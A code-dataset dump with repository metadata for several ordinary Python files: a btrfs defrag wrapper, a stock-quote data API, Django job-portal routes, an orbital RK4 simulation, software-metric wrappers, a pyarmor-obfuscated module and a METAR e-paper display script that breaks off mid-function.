Dataset schema (39 columns):
hexsha: stringlengths 40-40 | size: int64 5-2.06M | ext: stringclasses 10 values | lang: stringclasses 1 value
max_stars_repo_path: stringlengths 3-248 | max_stars_repo_name: stringlengths 5-125 | max_stars_repo_head_hexsha: stringlengths 40-78 | max_stars_repo_licenses: listlengths 1-10 | max_stars_count: int64 1-191k (nullable) | max_stars_repo_stars_event_min_datetime: stringlengths 24-24 (nullable) | max_stars_repo_stars_event_max_datetime: stringlengths 24-24 (nullable)
max_issues_repo_path: stringlengths 3-248 | max_issues_repo_name: stringlengths 5-125 | max_issues_repo_head_hexsha: stringlengths 40-78 | max_issues_repo_licenses: listlengths 1-10 | max_issues_count: int64 1-67k (nullable) | max_issues_repo_issues_event_min_datetime: stringlengths 24-24 (nullable) | max_issues_repo_issues_event_max_datetime: stringlengths 24-24 (nullable)
max_forks_repo_path: stringlengths 3-248 | max_forks_repo_name: stringlengths 5-125 | max_forks_repo_head_hexsha: stringlengths 40-78 | max_forks_repo_licenses: listlengths 1-10 | max_forks_count: int64 1-105k (nullable) | max_forks_repo_forks_event_min_datetime: stringlengths 24-24 (nullable) | max_forks_repo_forks_event_max_datetime: stringlengths 24-24 (nullable)
content: stringlengths 5-2.06M | avg_line_length: float64 1-1.02M | max_line_length: int64 3-1.03M | alphanum_fraction: float64 0-1
count_classes: int64 0-1.6M | score_classes: float64 0-1 | count_generators: int64 0-651k | score_generators: float64 0-1 | count_decorators: int64 0-990k | score_decorators: float64 0-1 | count_async_functions: int64 0-235k | score_async_functions: float64 0-1 | count_documentation: int64 0-1.04M | score_documentation: float64 0-1
hexsha: 3c3b9d3f39b8361cf623581c59d5c7de855eb076 | size: 943 | ext: py | lang: Python
repo_path: btrfslime/defrag/btrfs.py | repo_name: tsangwpx/btrfslime | head_hexsha: 49c141721c532706f146fea31d2eb171c6dd698b | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: 3 (2020-10-30T12:18:42.000Z to 2022-02-06T20:17:55.000Z) | max_issues_count: null | max_forks_count: null
content:
from __future__ import annotations
import os
import subprocess
from typing import AnyStr
from ..util import check_nonnegative
BTRFS_BIN = '/bin/btrfs'
def file_defrag(
target: AnyStr,
start: int = None,
size: int = None,
extent_size: int = None,
*,
flush=False,
btrfs_bin=BTRFS_BIN,
):
if isinstance(target, bytes):
target = os.fsdecode(target)
defrag_args = [btrfs_bin, 'filesystem', 'defrag']
if start is not None:
check_nonnegative('start', start)
defrag_args.extend(('-s', str(start)))
if size is not None:
check_nonnegative('size', size)
defrag_args.extend(('-l', str(size)))
if extent_size is not None:
check_nonnegative('extent_size', extent_size)
defrag_args.extend(('-t', str(extent_size)))
if flush:
defrag_args.append('-f')
defrag_args.append(os.fspath(target))
subprocess.check_call(defrag_args)
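A minimal usage sketch of file_defrag (hypothetical target path; assumes the btrfs CLI exists at /bin/btrfs and the caller may defragment the file):

from btrfslime.defrag.btrfs import file_defrag

# Ask btrfs to defragment one file, flushing data and targeting 32 MiB extents.
file_defrag('/srv/images/vm-disk.raw', extent_size=32 * 1024 * 1024, flush=True)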
avg_line_length: 21.930233 | max_line_length: 53 | alphanum_fraction: 0.652174 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 74 | score_documentation: 0.078473
hexsha: 3c3ddb0feb36d17a1b33c822d86fc630d77ff009 | size: 14,771 | ext: py | lang: Python
repo_path: fooltrader/api/quote.py | repo_name: lcczz/fooltrader | head_hexsha: fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: 1 (2018-04-03T06:25:24.000Z to 2018-04-03T06:25:24.000Z) | max_issues_count: null | max_forks_count: null
content:
# -*- coding: utf-8 -*-
import datetime
import logging
import os
from ast import literal_eval
import numpy as np
import pandas as pd
from fooltrader.consts import CHINA_STOCK_INDEX, USA_STOCK_INDEX
from fooltrader.contract import data_contract
from fooltrader.contract import files_contract
from fooltrader.contract.files_contract import get_kdata_dir, get_kdata_path
from fooltrader.settings import US_STOCK_CODES
from fooltrader.utils.utils import get_file_name, to_time_str
logger = logging.getLogger(__name__)
def convert_to_list_if_need(input):
if input and "[" in input:
return literal_eval(input)
else:
return input
# meta
def get_security_list(security_type='stock', exchanges=['sh', 'sz'], start=None, end=None,
mode='simple', start_date=None, codes=None):
"""
get security list.
Parameters
----------
security_type : str
        {'stock', 'future'}, default: stock
exchanges : list
['sh', 'sz','nasdaq','nyse','amex'],default: ['sh','sz']
start : str
the start code,default:None
only works when exchanges is ['sh','sz']
end : str
the end code,default:None
only works when exchanges is ['sh','sz']
mode : str
whether parse more security info,{'simple','es'},default:'simple'
start_date : Timestamp str or Timestamp
the filter for start list date,default:None
codes : list
the exact codes to query,default:None
Returns
-------
DataFrame
the security list
"""
if security_type == 'stock':
df = pd.DataFrame()
df_usa = pd.DataFrame()
for exchange in exchanges:
the_path = files_contract.get_security_list_path(security_type, exchange)
if os.path.exists(the_path):
if exchange == 'sh' or exchange == 'sz':
if mode == 'simple':
df1 = pd.read_csv(the_path,
converters={'code': str})
else:
df1 = pd.read_csv(the_path,
converters={'code': str,
'sinaIndustry': convert_to_list_if_need,
'sinaConcept': convert_to_list_if_need,
'sinaArea': convert_to_list_if_need})
df = df.append(df1, ignore_index=True)
elif exchange == 'nasdaq':
df_usa = pd.read_csv(the_path, dtype=str)
elif security_type == 'index':
df = pd.DataFrame(CHINA_STOCK_INDEX)
df_usa = pd.DataFrame()
if 'nasdaq' in exchanges:
df_usa = pd.DataFrame(USA_STOCK_INDEX)
if df.size > 0:
        if start:
            df = df[df["code"] >= start]
        if end:
            df = df[df["code"] <= end]
if start_date:
df['listDate'] = pd.to_datetime(df['listDate'])
df = df[df['listDate'] >= pd.Timestamp(start_date)]
df = df.set_index(df['code'], drop=False)
if df_usa.size > 0:
df_usa = df_usa.set_index(df_usa['code'], drop=False)
if codes:
df_usa = df_usa.loc[codes]
df = df.append(df_usa, ignore_index=True)
return df
def _get_security_item(code=None, id=None, the_type='stock'):
"""
get the security item.
Parameters
----------
code : str
the security code,default: None
id : str
the security id,default: None
the_type : str
the security type
Returns
-------
DataFrame
the security item
"""
df = get_security_list(security_type=the_type)
if id:
df = df.set_index(df['id'])
return df.loc[id,]
if code:
df = df.set_index(df['code'])
return df.loc[code,]
def to_security_item(security_item):
if type(security_item) == str:
if 'stock' in security_item:
security_item = _get_security_item(id=security_item, the_type='stock')
elif 'index' in security_item:
security_item = _get_security_item(id=security_item, the_type='index')
else:
security_item = _get_security_item(code=security_item)
return security_item
# tick
def get_ticks(security_item, the_date=None, start=None, end=None):
"""
get the ticks.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the tick for the exact date
start : TimeStamp str or TimeStamp
start date
end: TimeStamp str or TimeStamp
end date
Yields
-------
DataFrame
"""
security_item = to_security_item(security_item)
if the_date:
tick_path = files_contract.get_tick_path(security_item, the_date)
yield _parse_tick(tick_path, security_item)
else:
tick_dir = files_contract.get_tick_dir(security_item)
if start or end:
if not start:
start = security_item['listDate']
if not end:
end = datetime.datetime.today()
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir) if
get_file_name(f) in pd.date_range(start=start, end=end)]
else:
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir)]
for tick_path in sorted(tick_paths):
yield _parse_tick(tick_path, security_item)
def _parse_tick(tick_path, security_item):
if os.path.isfile(tick_path):
df = pd.read_csv(tick_path)
df['timestamp'] = get_file_name(tick_path) + " " + df['timestamp']
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df['code'] = security_item['code']
df['securityId'] = security_item['id']
return df
def get_available_tick_dates(security_item):
dir = files_contract.get_tick_dir(security_item)
return [get_file_name(f) for f in os.listdir(dir)]
# kdata
def get_kdata(security_item, the_date=None, start_date=None, end_date=None, fuquan='bfq', dtype=None, source='163',
level='day'):
"""
get kdata.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the kdata for the exact date
start_date : TimeStamp str or TimeStamp
start date
end_date : TimeStamp str or TimeStamp
end date
fuquan : str
{"qfq","hfq","bfq"},default:"bfq"
dtype : type
the data type for the csv column,default: None
source : str
the data source,{'163','sina'},default: '163'
level : str or int
the kdata level,{1,5,15,30,60,'day','week','month'},default : 'day'
Returns
-------
DataFrame
"""
security_item = to_security_item(security_item)
    # Data from 163 is already merged and carries the adjustment factor; it is all stored under the 'bfq' directory, so we only read from one place and convert as needed
if source == '163':
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan='bfq')
else:
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan=fuquan)
if os.path.isfile(the_path):
if not dtype:
dtype = {"code": str, 'timestamp': str}
df = pd.read_csv(the_path, dtype=dtype)
df.timestamp = df.timestamp.apply(lambda x: to_time_str(x))
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
if the_date:
if the_date in df.index:
return df.loc[the_date]
else:
return pd.DataFrame()
if not start_date:
if security_item['type'] == 'stock':
if type(security_item['listDate']) != str and np.isnan(security_item['listDate']):
start_date = '2002-01-01'
else:
start_date = security_item['listDate']
else:
start_date = datetime.datetime.today() - datetime.timedelta(days=30)
if not end_date:
end_date = datetime.datetime.today()
if start_date and end_date:
df = df.loc[start_date:end_date]
#
if source == '163' and security_item['type'] == 'stock':
if fuquan == 'bfq':
return df
if 'factor' in df.columns:
current_factor = df.tail(1).factor.iat[0]
                # hfq (backward-adjusted) prices never change afterwards
df.close *= df.factor
df.open *= df.factor
df.high *= df.factor
df.low *= df.factor
if fuquan == 'qfq':
                    # qfq (forward-adjusted) prices must be computed backwards from the latest factor
df.close /= current_factor
df.open /= current_factor
df.high /= current_factor
df.low /= current_factor
return df
return pd.DataFrame()
def get_latest_download_trading_date(security_item, return_next=True, source='163'):
df = get_kdata(security_item, source=source)
if len(df) == 0:
return pd.Timestamp(security_item['listDate'])
if return_next:
return df.index[-1] + pd.DateOffset(1)
else:
return df.index[-1]
def get_trading_dates(security_item, dtype='list', ignore_today=False, source='163', fuquan='bfq'):
df = get_kdata(security_item, source=source, fuquan=fuquan)
    if dtype == 'list' and len(df.index) > 0:
dates = df.index.strftime('%Y-%m-%d').tolist()
if ignore_today:
dates = [the_date for the_date in dates if the_date != datetime.datetime.today().strftime('%Y-%m-%d')]
return dates
return dates
return df.index
def kdata_exist(security_item, year, quarter, fuquan=None, source='163'):
df = get_kdata(security_item, fuquan=fuquan, source=source)
if "{}Q{}".format(year, quarter) in df.index:
return True
return False
# TODO:use join
def merge_to_current_kdata(security_item, df, fuquan='bfq'):
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df1 = get_kdata(security_item, source='sina', fuquan=fuquan, dtype=str)
df1 = df1.append(df)
df1 = df1.drop_duplicates(subset='timestamp', keep='last')
df1 = df1.sort_index()
the_path = files_contract.get_kdata_path(security_item, source='sina', fuquan=fuquan)
df1.to_csv(the_path, index=False)
def time_index_df(df):
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
return df
def add_factor_to_163(security_item):
path_163 = get_kdata_path(security_item, source='163', fuquan='bfq')
df_163 = pd.read_csv(path_163, dtype=str)
df_163 = time_index_df(df_163)
if 'factor' in df_163.columns:
df = df_163[df_163['factor'].isna()]
if df.empty:
            logger.info("{} 163 factor is ok".format(security_item['code']))
return
path_sina = get_kdata_path(security_item, source='sina', fuquan='hfq')
df_sina = pd.read_csv(path_sina, dtype=str)
df_sina = time_index_df(df_sina)
df_163['factor'] = df_sina['factor']
df_163.to_csv(path_163, index=False)
def merge_kdata_to_one(security_item=None, replace=False, fuquan='bfq'):
    if security_item is not None:
items = pd.DataFrame().append(security_item).iterrows()
else:
items = get_security_list().iterrows()
if fuquan:
fuquans = [fuquan]
else:
fuquans = ['bfq', 'hfq']
for index, security_item in items:
for fuquan in fuquans:
dayk_path = get_kdata_path(security_item, source='sina', fuquan=fuquan)
if fuquan == 'hfq':
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN_FQ)
else:
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN)
the_dir = get_kdata_dir(security_item, fuquan=fuquan)
if os.path.exists(the_dir):
files = [os.path.join(the_dir, f) for f in os.listdir(the_dir) if
('dayk.csv' not in f and os.path.isfile(os.path.join(the_dir, f)))]
for f in files:
df = df.append(pd.read_csv(f, dtype=str), ignore_index=True)
if df.size > 0:
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
logger.info("{} to {}".format(security_item['code'], dayk_path))
if replace:
df.to_csv(dayk_path, index=False)
else:
merge_to_current_kdata(security_item, df, fuquan=fuquan)
for f in files:
logger.info("remove {}".format(f))
os.remove(f)
if fuquan == 'hfq':
add_factor_to_163(security_item)
if __name__ == '__main__':
print(get_security_list(security_type='stock', exchanges=['nasdaq'], codes=US_STOCK_CODES))
# item = {"code": "000001", "type": "stock", "exchange": "sz"}
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1991, 3) == True
# assert kdata_exist(item, 1991, 4) == True
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1990, 1) == False
# assert kdata_exist(item, 2017, 1) == False
#
# df1 = get_kdata(item,
# datetime.datetime.strptime('1991-04-01', settings.TIME_FORMAT_DAY),
# datetime.datetime.strptime('1991-12-31', settings.TIME_FORMAT_DAY))
# df1 = df1.set_index(df1['timestamp'])
# df1 = df1.sort_index()
# print(df1)
#
# df2 = tdx.get_tdx_kdata(item, '1991-04-01', '1991-12-31')
# df2 = df2.set_index(df2['timestamp'], drop=False)
# df2 = df2.sort_index()
# print(df2)
#
# for _, data in df1.iterrows():
# if data['timestamp'] in df2.index:
# data2 = df2.loc[data['timestamp']]
# assert data2["low"] == data["low"]
# assert data2["open"] == data["open"]
# assert data2["high"] == data["high"]
# assert data2["close"] == data["close"]
# assert data2["volume"] == data["volume"]
# try:
# assert data2["turnover"] == data["turnover"]
# except Exception as e:
# print(data2["turnover"])
# print(data["turnover"])
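A minimal usage sketch of the quote API above (hypothetical security id and dates; assumes the fooltrader CSV data files have already been downloaded locally):

from fooltrader.api.quote import get_security_list, get_kdata

stocks = get_security_list(security_type='stock', exchanges=['sh', 'sz'])
kdata = get_kdata('stock_sz_000001', start_date='2017-01-01',
                  end_date='2017-12-31', fuquan='qfq')
print(kdata[['timestamp', 'open', 'close']].tail())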
avg_line_length: 32.89755 | max_line_length: 115 | alphanum_fraction: 0.580326 | count_classes: 0 | score_classes: 0 | count_generators: 1,302 | score_generators: 0.087471 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 4,343 | score_documentation: 0.29177
hexsha: 3c3f46d21ba0b951765c196ff37b42684f836343 | size: 432 | ext: py | lang: Python
repo_path: backend/jobPortal/api/urls.py | repo_name: KshitijDarekar/hackViolet22 | head_hexsha: c54636d3044e1d9a7d8fa92a4d781e79f38af3ca | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: 2 (2022-02-06T04:58:24.000Z to 2022-02-06T05:31:18.000Z) | max_issues_count: 5 (2022-02-06T05:08:04.000Z to 2022-02-06T16:29:51.000Z) | max_forks_count: 2 (2022-02-06T04:58:43.000Z to 2022-02-06T17:56:23.000Z)
content:
from django.urls import path
from . import views
# Refer to the corresponding view function for more details of the url routes
urlpatterns = [
path('', views.getRoutes, name="index"),
path('add/', views.addJob, name="addJob" ),
path('delete/<int:id>', views.removeJob, name="removeJob" ),
path('get-jobs/', views.getJobs, name='getJobs'),
path('company/jobs/', views.getCompanyJobs, name='getCompanyJobs'),
]
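A quick illustration of resolving these named routes with Django's reverse() (hypothetical; assumes this urlconf is included at the site root):

from django.urls import reverse

reverse('getJobs')              # '/get-jobs/'
reverse('removeJob', args=[7])  # '/delete/7'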
avg_line_length: 33.230769 | max_line_length: 77 | alphanum_fraction: 0.685185 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 179 | score_documentation: 0.414352
hexsha: 3c4027e0a85dd326115e24d1e6e1369d17bbdebc | size: 3,135 | ext: py | lang: Python
repo_path: rh_project/pick_six.py | repo_name: hrichstein/phys_50733 | head_hexsha: a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
def find_vel_init(M1, M2, a):
    period = np.sqrt(4 * np.pi**2 * a**3 / G / (M1 + M2)) # period in years
print("Period is {0:.3f} years".format(period))
v = 2 * np.pi * a / period # AU/year
print(v)
return v
# def rk4_func(params):
# s1, s2, p, vs1, vs2, vp = params
# s1x, s1y = s1
# s2x, s2y = s2
# px, py = p
# # s1_vx, s1_vy = vs1
# # s2_vx, s2_vy = vs2
# # p_vx, p_vy = vp
# a1x = -G * red_mass * 0.1 / np.sqrt(0.1)**3
# a1y = -G * red_mass * 0 / np.sqrt(0.1)**3
# # R1px = abs(s1x - px)
# # R1py = abs(s1y - py)
# # R2px = abs(s2x - px)
# # R2py = abs(s2y - py)
# # R12x = abs(s1x - s2x)
# # R12y = abs(s1y - s2y)
# # R1p = np.sqrt((s1x - px)**2 + (s1y - py)*2)
# # R2p = np.sqrt((s2x - px)**2 + (s2y - py)*2)
# # R12 = A # global variable
# # a1_2x = -G * M1 * R12x / R12**3
# # a1_2y = -G * M1 * R12y / R12**3
# # a2_1x = -G * M2 * R12x
def ghetto(arr):
x, y, vx, vy = arr
ax = -G * red_mass * x / np.sqrt(x**2 + y**2)**3
# ax += -G * M1 *
ay = -G * red_mass * y / np.sqrt(x**2 + y**2)**3
ac_arr = np.array([ax, ay], float)
# print(x)
return np.array([vx, vy, ax, ay])
# Constants
G = 4 * np.pi**2 # AU^3 yr^-2 M_sun^-1
A = 0.2 # AU
r = A/2 # semi-major axis & radius
test_plan = 1 # AU
a = 0
b = .02
N = 100000
h = (b-a)/N
M1 = 1
M2 = 1
red_mass = M1*M2/(M1+M2)
tpoints = np.arange(a, b, h)  # fractional time points, so keep the default float dtype
s1 = np.array([r, 0], float)
s2 = np.array([-r,0], float)
p = np.array([test_plan, 0], float)
s_vel = find_vel_init(M1, red_mass, r)
# s_vel = np.sqrt(10*G*red_mass)
p_vel = find_vel_init(red_mass, 0, test_plan)
print(s_vel)
s1_v0 = np.array([0, s_vel], float)
s2_v0 = np.array([0, -s_vel], float)
p_v0 = np.array([0, p_vel], float)
all_params = np.array([s1, s2, p, s1_v0, s2_v0, p_v0])
xpts_s1 = [[] for tt in range(len(tpoints))]
ypts_s1 = [[] for tt in range(len(tpoints))]
xpts_s2 = [[] for tt in range(len(tpoints))]
ypts_s2 = [[] for tt in range(len(tpoints))]
xpts_p = [[] for tt in range(len(tpoints))]
ypts_p = [[] for tt in range(len(tpoints))]
s_ghet = np.array([s1[0], s1[1], s1_v0[0], s1_v0[1]])
for tt in range(len(tpoints)):
xpts_s1[tt] = s_ghet[0]
ypts_s1[tt] = s_ghet[1]
k1 = h * ghetto(s_ghet)
k2 = h * ghetto(s_ghet + 0.5*k1)
k3 = h * ghetto(s_ghet + 0.5*k2)
k4 = h * ghetto(s_ghet + k3)
s_ghet += (k1 + 2*k2 + 2*k3 + k4) / 6
# print(s_ghet[0])
plt.plot(xpts_s1, ypts_s1)
plt.show()
# def f(s,t):
# x, y, vx, vy = s
# R = np.sqrt(x**2 + y**2)
# ax = (-GMsun * x )/R ** 3
# ay = (-GMsun * y )/R ** 3
# return np.array([vx, vy, ax, ay])
# r0 = np.array([r, 0.0], float)
# v0 = np.array([0, -s_vel], float)
# s = np.array([r0[0], r0[1], v0[0], v0[1]])
# for tt in :
# solution[j] = s
# k1 = h*f(s,t)
# k2 = h*f(s+0.5*k1,t+0.5*h)
# k3 = h*f(s+0.5*k2,t+0.5*h)
# k4 = h*f(s+k3,t+h)
# s += (k1+2*k2+2*k3+k4)/6
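The loop above applies one classic fourth-order Runge-Kutta step per iteration; a compact sketch of the same step as a reusable helper (hypothetical refactor, not part of the original script):

def rk4_step(f, s, h):
    """Advance the state vector s by one step of size h with classic RK4."""
    k1 = h * f(s)
    k2 = h * f(s + 0.5 * k1)
    k3 = h * f(s + 0.5 * k2)
    k4 = h * f(s + k3)
    return s + (k1 + 2 * k2 + 2 * k3 + k4) / 6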
avg_line_length: 19.59375 | max_line_length: 71 | alphanum_fraction: 0.551515 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,380 | score_documentation: 0.440191
hexsha: 3c42036c78c029c70b9f27f5eeeede981c311ba5 | size: 1,704 | ext: py | lang: Python
repo_path: recoda/analyse/python/metrics.py | repo_name: hansendx/recoda | head_hexsha: 09e25843376613b17c6b42d45e30b895b24a7d9d | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
""" Provides functionality to calculate software metrics in python projects.
"""
from recoda.analyse.python import (
_general,
_installability,
_understandability,
_verifiability,
_correctness,
)
from recoda.analyse.independent import (
learnability,
openness
)
# pylint: disable-msg=c0103
# For now this seems to be the most streamlined way to decentralize this
# module. We want to call all functions via the metrics module, but we do
# not want it to be too long and unreadable. Wrapping the private module
# functions in bare-bones wrappers would just add a lot of unnecessary code.
# Installability related metrics.
#packageability = _installability.packageability
packageability = _installability.packageability
requirements_declared = _installability.requirements_declared
docker_setup = _installability.docker_setup
singularity_setup = _installability.singularity_setup
# Learnability related metrics.
project_readme_size = learnability.project_readme_size
project_doc_size = learnability.project_doc_size
flesch_reading_ease = learnability.flesch_reading_ease
flesch_kincaid_grade = learnability.flesch_kincaid_grade
readme_flesch_reading_ease = learnability.readme_flesch_reading_ease
readme_flesch_kincaid_grade = learnability.readme_flesch_kincaid_grade
# Understandability related metrics.
average_comment_density = _understandability.average_comment_density
standard_compliance = _understandability.standard_compliance
# Openness related metrics.
license_type = openness.license_type
testlibrary_usage = _verifiability.testlibrary_usage
# Correctness related metrics.
error_density = _correctness.error_density
# General
loc = _general.count_loc
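A hypothetical call pattern for this facade module (the argument each metric takes is not shown in this file; a path to a project checkout is assumed here):

from recoda.analyse.python import metrics

project_path = '/tmp/example-project'   # hypothetical checkout
print(metrics.loc(project_path))
print(metrics.packageability(project_path))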
avg_line_length: 29.894737 | max_line_length: 76 | alphanum_fraction: 0.834507 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 615 | score_documentation: 0.360915
hexsha: 3c42183d7ca6ff665b6de8859306ffa82f1f09f2 | size: 1,667 | ext: py | lang: Python
repo_path: legacy/functional_code/pulson440/__init__.py | repo_name: jjimmykang/bwsi-backprojection | head_hexsha: 440e21f90e2a1d0d1c28bfd9a0faaf97129378a5 | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: 1 (2020-02-09T19:09:27.000Z to 2020-02-09T19:09:27.000Z) | max_issues_count: null | max_forks_count: null
content:
__pyarmor__(__name__, __file__, b'\xe2\x50\x8c\x64\x26\x42\xd6\x01\x5c\x5c\xf8\xa8\x85\x0c\x21\xe7\x0a\xa2\x45\x58\x6e\xc9\x3c\xd5\x55\x40\x64\x69\x7d\x5f\x63\xcb\x41\xdc\x71\xdf\x4d\x82\x99\xc8\xc1\x98\xfd\x46\x67\x20\x2f\xed\x4b\xf6\xf9\x41\x55\x5c\x47\x3c\x78\x07\x75\x5d\x9b\x88\xa2\x6e\x5e\x78\xf3\x9c\x88\xba\xed\x07\xab\xfe\x63\x70\x5d\x62\xc4\xbe\xfd\x5d\x4c\x32\x27\x59\x91\x67\x1e\xb0\x09\xec\x0b\x12\x11\x95\xce\xb2\xee\x37\xe2\x0e\x96\xb7\x83\x5e\x28\x3a\xde\x3f\xd7\xea\x21\x4b\xeb\x6e\x65\x36\x4c\x34\x8b\xd6\x28\x44\x50\x1e\xd0\xe8\x0b\xd9\x61\x73\x2c\xb2\x29\xf7\x42\xb4\x2e\x08\x97\x23\xd0\xd3\x76\xcf\xf0\xe9\xb7\x3c\x9e\xc4\x57\xc6\xab\x9f\xbb\xbb\x63\xc3\x80\xf3\x9d\x1e\x6d\x3c\xaf\x91\x80\x55\xbb\xc8\xa2\x26\x03\x92\xdd\x15\x99\x70\x84\xc0\xcd\x34\xcf\x1f\x23\xea\xba\xad\x7a\x1e\xe1\xb6\x93\xed\x61\xa7\xf2\x15\x58\x20\x19\x08\xca\x8c\x31\x89\x05\x52\x81\xde\xfa\x76\x9a\xa3\x91\x5b\x25\xb8\x2b\xd0\x4f\xfb\x4a\x92\x15\x71\x4f\x8e\xf2\x6e\xe8\xdb\x23\xb4\x9f\xee\x94\xd0\x7a\x58\xeb\x22\xb7\x25\x08\xac\x2e\xf9\xa1\x0c\x37\xc5\xe8\x58\xe6\x26\xaf\x21\xce\x28\x4c\xdf\x09\xdc\xf8\xd7\x78\xe5\xc2\xb7\x32\x78\x09\x03\xf7\x28\x4f\x25\xc6\xe8\x87\x28\xef\x7a\x84\x1b\x88\x23\x5d\xf4\x6c\xf4\x0c\xa2\x02\x3b\x2e\x56\x30\xcd\x24\xff\x8f\xb8\xb0\x7c\x7c\x2e\x84\x60\x13\x25\xfe\xcc\x1b\x2d\xa3\xe1\xe2\x45\xff\x3f\x0b\xfe\xca\x49\x50\xbd\x3d\x64\x8e\xb5\xe9\x62\xcf\xaf\xb7\x99\x80\x7a\xfc\xdf\x31\x65\xf1\x24\xd9\xec\x50\xd9\x7f\xd0\xf6\x4a\xcd\xfc\x3d\x7e\xfd\xf8\x3c\xd5\x16\xfe\x8a\x68\xb7\xf3\xf2\x13\x1d\xa9\x91\x9a\x51\x8e\xc0\xa5\x81\x04\xd6\x08\x90\xf1\xcd\x69\x01\x2b\xd5\x29\xe3\x4e\x7b\x16\x4a\xf6\x61\xd8\x1f\xde\x87\xb2\x40\x8d\x68', 1)
avg_line_length: 1,667 | max_line_length: 1,667 | alphanum_fraction: 0.74985 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,631 | score_documentation: 0.978404
hexsha: 3c43222bbb55fdc6b4f2d6c2fab0d2b77fcb11ea | size: 3,278 | ext: py | lang: Python
repo_path: metarmap/commands/display.py | repo_name: wastrachan/metarmap | head_hexsha: 2ff9bc3e94d731b83470c2283bfb67600143d719 | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
import datetime
import os
import textwrap
import click
from PIL import Image, ImageDraw, ImageFont
from metarmap.configuration import config, debug, get_display_lock_content, set_display_lock_content
from metarmap.libraries.aviationweather import metar
from metarmap.libraries.waveshare_epd import epd2in13_V2
FONTDIR = os.path.abspath('/usr/share/fonts/truetype/freefont/')
FONT = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 13)
FONT_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 13)
FONT_TITLE = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 15)
FONT_TITLE_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 15)
@click.command()
def clear_display():
""" Clear the ePaper display """
debug('Clear e-paper display')
epd = epd2in13_V2.EPD()
epd.init(epd.FULL_UPDATE)
epd.Clear(0xFF)
@click.command()
def update_display():
""" Update the ePaper display with current METAR observation """
# Fetch Observation
station = config['SCREEN'].get('airport', None)
debug(f'Selected airport for e-paper display: {station}')
if not station:
return
try:
observation = metar.retrieve([station, ])[0]
debug(f'Fetched latest weather for station {station}')
except IndexError:
debug(f'Weather not found for station {station}')
return
# Convert observation time to local (system) timezone
timezone = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
timezone_name = datetime.datetime.now(datetime.timezone.utc).astimezone().tzname()
observation_time_local = observation.get('observation_time').astimezone(timezone)
# Test observation_time, do not update display if weather observation is not new
new_lock = f'{station}{observation.get("observation_time")}'
old_lock = get_display_lock_content()
if new_lock == old_lock:
debug(f'New weather {new_lock} is the same as old weather {old_lock}. Not updating e-ink display')
return
debug(f'New weather {new_lock} supersedes old weather {old_lock}. Saving in lockfile.')
set_display_lock_content(new_lock)
# Initialize Display
debug('Initialize e-paper display')
epd = epd2in13_V2.EPD()
display_width = epd.height
display_height = epd.width
epd.init(epd.FULL_UPDATE)
image = Image.new('1', (display_width, display_height), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
# Title
debug('Draw title on e-paper display')
draw.rectangle(((0, 0), (display_width / 2, 22)), fill=0)
draw.text((2, 0), f'METAR {station}', font=FONT_TITLE_BOLD, fill=255)
msg = observation_time_local.strftime('%m/%d/%y %H:%M') + timezone_name[0]
w, h = FONT_TITLE.getsize(msg)
draw.text(((display_width - w - 2), 0), msg, font=FONT_TITLE)
draw.line(((0, 22), (display_width, 22)), fill=0, width=1)
# METAR Text
